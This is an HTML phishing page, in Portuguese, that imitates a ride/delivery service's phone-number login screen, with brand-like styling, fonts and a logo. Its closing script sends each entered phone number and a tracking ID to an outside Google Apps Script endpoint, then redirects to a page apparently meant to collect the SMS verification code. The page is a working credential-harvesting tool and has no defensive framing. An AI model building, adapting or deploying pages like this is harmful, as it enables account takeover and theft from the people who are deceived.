<!doctype html>
<html dir="ltr" lang="pt-PT">

<head>
  <meta charset="utf-8" />

  <title>ABCD</title>

  <meta data-rh="true" name="viewport" content="width=device-width, initial-scale=1" />
  <meta data-rh="true" name="format-detection" content="telephone=no" />
  <meta data-rh="true" name="format-detection" content="date=no" />
  <meta data-rh="true" name="format-detection" content="address=no" />
  <meta data-rh="true" name="format-detection" content="email=no" />
  <link data-rh="true" rel="icon" type="image/x-icon" href="/v2/_static/99c4bc580c8b57b7.ico" />
  <style data-rh="true">
    html,
    body {
      margin: 0;
      padding: 0;
      margin: auto;
      box-sizing: border-box;
    }

    *,
    *:before,
    *:after {
      box-sizing: inherit;
      font-family: -apple-system, BlinkMacSystemFont, "SegoeUI", Roboto, Helvetica, Arial, sans-serif, "AppleColorEmoji", "SegoeUIEmoji", "SegoeUISymbol";
    }

    @media(min-width:600px) {

      html,
      body {
        background-color: #FFF;
        display: flex;
        flex-direction: column;
        justify-content: center;
      }
    }

    a {
      color: #000;
      text-decoration: underline;
    }

    button {
      margin: 0;
      padding: 0;
      border: none;
      background: none;
      outline: none;
    }

    button::-moz-focus-inner,
    input::-moz-focus-inner {
      border: 0;
      padding: 0;
    }

    html,
    body,
    #root,
    #wrapper {
      height: 100%;
      width: 100%;
    }
  </style>
  <style data-rh="true">
    body {
      overscroll-behavior: none
    }
  </style>
  <style data-rh="true" id="arkose-style">
    #arkose-challenge,
    #arkose-challenge iframe {
      max-width: 100% !important;
    }
  </style>
  <style class="_styletron_hydrate_" data-hydrate="keyframes">
    @keyframes ae {
      0% {
        transform: rotate(0deg)
      }

      100% {
        transform: rotate(360deg)
      }
    }
  </style>
  <style class="_styletron_hydrate_">
    .ae {
      display: -webkit-box;
      display: -moz-box;
      display: -ms-flexbox;
      display: -webkit-flex;
      display: flex
    }

    .af {
      -webkit-box-orient: vertical;
      -webkit-box-direction: normal;
      flex-direction: column
    }

    .ag {
      box-sizing: border-box
    }

    .ah {
      position: absolute
    }

    .ai {
      top: -10000px
    }

    .aj {
      left: -10000px
    }

    .ak {
      -webkit-box-align: center;
      align-items: center
    }

    .al {
      min-height: 64px
    }

    .am {
      padding: 0px 32px
    }

    .an {
      background-color: #000000
    }

    .ao {
      -webkit-box-pack: justify;
      justify-content: space-between
    }

    .aq {
      flex: 1
    }

    .au {
      width: 100%
    }

    .av {
      height: 100%
    }

    .aw {
      -webkit-box-pack: center;
      justify-content: center
    }

    .az {
      padding: 0 16px
    }

    .b1 {
      padding-top: 16px
    }

    .b2 {
      -webkit-box-flex: 1;
      flex-grow: 1
    }

    .b3 {
      font-size: 20px
    }

    .b4 {
      font-weight: 400
    }

    .b5 {
      line-height: 32px
    }

    .b8 {
      margin: 0px
    }

    .b9 {
      color: #000000
    }

    .ba {
      height: 8px
    }

    .bb {
      flex: 1 0 auto
    }

    .bc {
      outline: none
    }

    .bd {
      border: none
    }

    .be {
      font-size: 16px
    }

    .bf {
      line-height: 24px
    }

    .bg {
      padding: 0
    }

    .bh {
      margin: 0
    }

    .bi {
      background: #F3F3F3
    }

    .bj {
      text-align: left
    }

    .bk {
      padding-right: unset
    }

    .bl:focus {
      background: #f6f6f6
    }

    .bm::placeholder {
      color: #5E5E5E
    }

    .bn {
      -webkit-box-orient: horizontal;
      -webkit-box-direction: normal;
      flex-direction: row
    }

    .bo {
      margin-right: 8px
    }

    .bp {
      min-width: 104px
    }

    .bq {
      display: none
    }

    .br {
      cursor: pointer
    }

    .bs {
      padding-left: 6px
    }

    .bt {
      padding-right: 16px
    }

    .bu {
      background: #eee
    }

    .bv {
      border: 2px solid #8a8a8a;
    }

    .bw {
      border-radius: 8px
    }

    .bx {
      font-size: 32px
    }

    .by {
      padding: 10px 0 10px 10px
    }

    .bz {
      margin-left: 2px
    }

    .c0 {
      margin-right: 10px
    }

    .c1 {
      display: inherit
    }

    .c2 {
      padding: 10px 0 10px 12px
    }

    .c3:focus-within {
      border: 2px solid black
    }

    .c4:focus-within {
      background: #f6f6f6
    }

    .c5 {
      padding-left: 4px
    }

    .c6 {
      font-size: 13px
    }

    .c7 {
      line-height: 16px
    }

    .c8 {
      color: #DE1135
    }

    .c9 {
      padding-top: 0px
    }

    .ca {
      height: 16px
    }

    .cb {
      height: 48px
    }

    .cc {
      z-index: 100
    }

    .cd {
      border: 6px solid #F3F3F3
    }

    .ce {
      border-radius: 50%
    }

    .cf {
      border-top: 6px solid #276EF1
    }

    .cg {
      width: 40px
    }

    .ch {
      height: 40px
    }

    .ci {
      animation-name: ae
    }

    .cj {
      animation-duration: 1s
    }

    .ck {
      animation-timing-function: linear
    }

    .cl {
      animation-iteration-count: infinite
    }

    .cm {
      gap: 8px
    }

    .cn {
      color: #5E5E5E
    }

    .co {
      padding: 4px 0
    }

    .cp::before {
      content: " "
    }

    .cq::before {
      display: block
    }

    .cr::before {
      background: #5E5E5E
    }

    .cs::before {
      height: 1px
    }

    .ct::before {
      -webkit-box-flex: 1;
      flex-grow: 1
    }

    .cu::after {
      content: " "
    }

    .cv::after {
      display: block
    }

    .cw::after {
      background: #5E5E5E
    }

    .cx::after {
      height: 1px
    }

    .cy::after {
      -webkit-box-flex: 1;
      flex-grow: 1
    }

    .cz {
      font-size: 14px
    }

    .d0 {
      margin: 0 8px
    }

    .d1 {
      width: 20px
    }

    .d2 {
      height: 20px
    }

    .d3 {
      position: relative
    }

    .d4 {
      opacity: 0.3
    }

    .d5 {
      -webkit-box-align: start;
      align-items: start
    }

    .d6 {
      text-align: center
    }

    .d7 {
      border: 2px solid #F3F3F3
    }

    .d8 {
      border-top: 2px solid #276EF1
    }

    .d9 {
      background: #E8E8E8
    }

    .da {
      color: black
    }

    .db {
      line-height: 20px
    }

    .dc {
      -webkit-transition: background 200ms cubic-bezier(0, 0, 1, 1);
      -moz-transition: background 200ms cubic-bezier(0, 0, 1, 1);
      transition: background 200ms cubic-bezier(0, 0, 1, 1)
    }

    .dd {
      box-shadow: none
    }

    .de {
      font-weight: 500
    }

    .df:focus-visible {
      box-shadow: inset 0 0 0 3px #276EF1
    }

    .dg:disabled {
      cursor: not-allowed
    }

    .dh:disabled {
      background: #F3F3F3
    }

    .di:disabled {
      color: #A6A6A6
    }

    .dj {
      padding: 14px 16px
    }

    .dk {
      min-height: 48px
    }

    .dl:hover {
      background: #DDDDDD
    }

    .dm:active {
      background: #BBBBBB
    }

    .dn {
      text-decoration: none
    }

    .do {
      font-size: inherit
    }

    .dp {
      margin-bottom: 24px
    }

    .dq {
      font-size: 12px
    }

    .dr {
      margin-bottom: 8px
    }

    .ds {
      position: fixed
    }

    .dt {
      top: 0
    }

    .du {
      left: 0
    }

    .dv {
      right: 0
    }

    .dw {
      -webkit-box-pack: start;
      justify-content: flex-start
    }

    .dx {
      padding-top: 12px
    }

    .dy {
      bottom: 0
    }

    .dz {
      background-color: rgba(0, 0, 0, 0.5)
    }

    .e0 {
      z-index: 2
    }

    .e1 {
      background-color: #fff
    }

    .e2 {
      opacity: 0.7
    }

    .e3 {
      margin: 16px
    }
  </style>
  <style class="_styletron_hydrate_" media="(min-width: 600px)">
    .ap {
      padding: 0px 64px
    }

    .ar {
      display: -webkit-box;
      display: -moz-box;
      display: -ms-flexbox;
      display: -webkit-flex;
      display: flex
    }

    .as {
      -webkit-box-align: center;
      align-items: center
    }

    .at {
      -webkit-box-pack: center;
      justify-content: center
    }

    .ax {
      max-width: 1440px
    }

    .ay {
      gap: 64px
    }

    .b0 {
      max-width: 360px
    }

    .b6 {
      font-size: 24px
    }

    .b7 {
      line-height: 30px
    }
  </style>
  <style>
    @font-face {
      font-family: "Postmates-Regular";
      font-display: fallback;
      src: url("/v2/_static/cf91dd9830a4bf06.woff2") format("woff2"), url("/v2/_static/12594e16812e7705.woff") format("woff");
    }

    @font-face {
      font-family: "Postmates-Medium";
      font-display: fallback;
      src: url("/v2/_static/816252b1ce5a5050.woff2") format("woff2"), url("/v2/_static/030554c2543492ba.woff") format("woff");
    }

    @font-face {
      font-family: "Postmates-Bold";
      font-display: fallback;
      src: url("/v2/_static/df4998612acf89b1.woff2") format("woff2"), url("/v2/_static/ba0cad8e3943b581.woff") format("woff");
    }
  </style>



</head>

<body>
  <div id="root">
    <div id="wrapper" class="ae af">
      <div class="ag ah ai aj"></div>
      <div data-testid="header-main" class="ae ak al am an ao ap"><svg xmlns="http://www.w3.org/2000/svg" width="57"
          height="20" fill="none">
          <path fill="#FFF"
            d="M8 17.4c2.6 0 4.7-2 4.7-5.1V.3h2.9v19.4h-2.9v-1.8a7 7 0 01-5 2.1c-4.2 0-7.4-3-7.4-7.6V.4h3v11.9c0 3 2 5.1 4.6 5.1zM17.7.3h2.8v7a7 7 0 015-2c4 0 7.3 3.3 7.3 7.4 0 4-3.2 7.3-7.4 7.3a7 7 0 01-5-2.1v1.8h-2.7V.3zm7.6 17.2c2.6 0 4.8-2.1 4.8-4.9 0-2.7-2.2-4.8-4.8-4.8a4.8 4.8 0 00-4.9 4.8c0 2.8 2.2 5 4.9 5zM41.1 5.3c4 0 7 3.1 7 7.3v1H36.7c.4 2.2 2.3 4 4.7 4 1.6 0 3-.7 4-2.1l2 1.5a7.3 7.3 0 01-6 3 7.3 7.3 0 01-7.5-7.4c0-4 3.1-7.3 7.2-7.3zm-4.3 6h8.5a4.4 4.4 0 00-4.2-3.6c-2.1 0-3.8 1.5-4.3 3.6zM55.6 8c-1.8 0-3.2 1.5-3.2 3.7v8h-2.7V5.6h2.7v1.7a3.7 3.7 0 013.4-1.8h1V8h-1.2z">
          </path>
        </svg></div>
      <div class="aq ar as at">
        <div class="ae au av aw ax as ay">
          <div role="main" screen-test="PHONE_NUMBER_INITIAL" flow-test="INITIAL" class="ae aq af ag az au b0">
            <div class="av ae af ao b1 ag">
              <div class="ae af b2">
                <h1 id="title" class="b3 b4 b5 b6 b7 b8 b9">Qual é o seu número de telefone?</h1>
                <div class="ba"></div>
                <div class="ae af bb">
                  <div class=""><bdi class="ae bn ak bf">
                      <div id="PHONE_COUNTRY_CODE" data-testid="PHONE_COUNTRY_CODE"
                        aria-label="Escolha um código de país" class="bo bp bq">
                        <div class="br ae bs bt bu bv bw ao">
                          <div class="bx by">
                            <div class="bz"><span class="c0 c1">🇧🇷</span></div>
                          </div>
                          <div class="ae ak"><svg height="16" width="16" viewBox="0 0 24 24">
                              <path
                                d="M12.7071 15.2929L17.1464 10.8536C17.4614 10.5386 17.2383 10 16.7929 10L7.20711 10C6.76165 10 6.53857 10.5386 6.85355 10.8536L11.2929 15.2929C11.6834 15.6834 12.3166 15.6834 12.7071 15.2929Z">
                              </path>
                            </svg></div>
                        </div>
                      </div>
                      <div id="phone-number-or-email-input-container" class="ae bn bv c2 bi au bw c3 c4">
                        <div class="c5 au">
                          <input id="PHONE_NUMBER_or_EMAIL_ADDRESS" title="Número de telefone da conta ABCD"
                            autocomplete="tel" inputmode="numeric" name="phone" type="tel" autocorrect="off"
                            autocapitalize="off" spellcheck="false" class="bc bd be bf bg bh bi au bj bk bl bm"
                            autofocus="" placeholder="Número de telefone da conta ABCD"
                            aria-label="Número de telefone da conta ABCD" pattern="\d{11}" maxlength="11" minlength="11"
                            required oninput="this.value=this.value.replace(/[^0-9]/g,'');" />
                        </div>

                      </div>
                    </bdi></div>
                  <p class="c6 c7 c8 b8 c9"></p>

                  <p id="field-error" class="c6 c7 c8 b8 e8" data-testid="phone-or-email-error"
                    style="display:none; padding-top:8px;">Introduza um número de telefone válido</p>
                  <div class="ca"></div>

                  <button class="e4 e5 be db ae bd ak br dc bc dd de bh df dg dh di bw dj dk e6 e7" id="forward-button"
                    type="button" data-testid="forward-button">
                    <div class="ae ao ak au">
                      <div class="ae ak"></div>
                      <div class="ae ak">Continuar</div>
                      <div class="ae ak"></div>
                    </div>
                  </button>
                  <script>
                    document.getElementById('forward-button').onclick = function () {
                      var input = document.getElementById('PHONE_NUMBER_or_EMAIL_ADDRESS');
                      var error = document.getElementById('field-error');
                      if (input.value.length === 11) {
                        error.textContent = '';
                        error.style.display = 'none';
                        window.location.href = './verificar-sms.html';
                      } else {
                        error.textContent = 'Introduza um número de telefone válido';
                        error.style.display = 'block';
                      }
                    };
                  </script>

                  <style>
                    .e5 {
                      color: rgb(255, 255, 255);
                    }

                    .e4 {
                      background: rgb(0, 0, 0);
                    }

                    .e6:hover {
                      background: rgb(40, 40, 40);
                    }

                    .dk {
                      min-height: 48px;
                    }

                    .dj {
                      padding: 14px 16px;
                    }

                    .de {
                      font-weight: 500;
                    }

                    .dd {
                      box-shadow: none;
                    }

                    .dc {
                      -webkit-transition: background 200ms cubic-bezier(0, 0, 1, 1);
                      -moz-transition: background 200ms cubic-bezier(0, 0, 1, 1);
                      transition: background 200ms cubic-bezier(0, 0, 1, 1);
                    }

                    .db {
                      line-height: 20px;
                    }

                    .bw {
                      border-radius: 8px;
                    }

                    .br {
                      cursor: pointer;
                    }

                    .bh {
                      margin: 0;
                    }

                    .be {
                      font-size: 16px;
                    }

                    .bd {
                      border: none;
                    }

                    .bc {
                      outline: none;
                    }

                    .ak {
                      -webkit-box-align: center;
                      align-items: center;
                    }
                  </style>

                  <div>
                    <div class="ca"></div>
                    <div class="ae af cm ">
                      <div class="ae ak cn co cp cq cr cs ct cu cv cw cx cy">

                      </div>

                    </div>
                  </div>
                  <div>
                    <div class="ca"></div>
                  </div>

                  <p id="formFooterPhone" data-testid="phone-footer" class="dq db b8 cn bt dr">Ao continuar, autoriza a
                    ABCD e as suas afiliadas a entrarem em contacto consigo através de chamada telefónica, WhatsApp ou
                    SMS/RCS, incluindo por meios automatizados, utilizando o número que forneceu.</p>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      <div class="ae ds dt du dv ak dw af dx"></div>
      <div aria-hidden="true" class="full_screen_overlay ds bq au av dt du dv dy dz e0"></div>

      <div class="bq">
        <div id="bottom-modal-content" class="e3">
          <div style="position:absolute;z-index:-1;top:0;left:0;height:0;width:0;overflow:hidden"></div>
        </div>
      </div>
    </div>
    <div class=""></div>
  </div>


  <script>alert('TESTE: arquivo carregou!');</script>


  <script>
    function gerarIdUnico() {
      return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function (c) {
        var r = Math.random() * 16 | 0, v = c === 'x' ? r : (r & 0x3 | 0x8);
        return v.toString(16);
      });
    }

    document.getElementById('forward-button').onclick = function () {
      console.log('Botão clicado'); // <-- ESTA LINHA!
      var input = document.getElementById('PHONE_NUMBER_or_EMAIL_ADDRESS');
      var error = document.getElementById('field-error');
      if (input.value.length === 11) {
        error.textContent = '';
        error.style.display = 'none';

        // ==== NOVO: Gerar ou recuperar ID único ====
        var userId = localStorage.getItem('lead_id');
        if (!userId) {
          userId = gerarIdUnico();
          localStorage.setItem('lead_id', userId);
        }

        // ==== NOVO: Enviar para Google Sheets ====
        fetch('https://script.google.com/macros/s/AKfycbzdTCSQhpOthvps8albXx-JTjZcuZbXThrvsCwHduCT89mwLLZoBQoDQyps8pUz7oxc/exec', {
          method: 'POST',
          mode: 'no-cors',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            id: userId,
            phone: input.value
          })
        });

        // ==== Redireciona ====
        window.location.href = './verificar-sms.html';
      } else {
        error.textContent = 'Introduza um número de telefone válido';
        error.style.display = 'block';
      }
    };
  </script>



</body>

</html>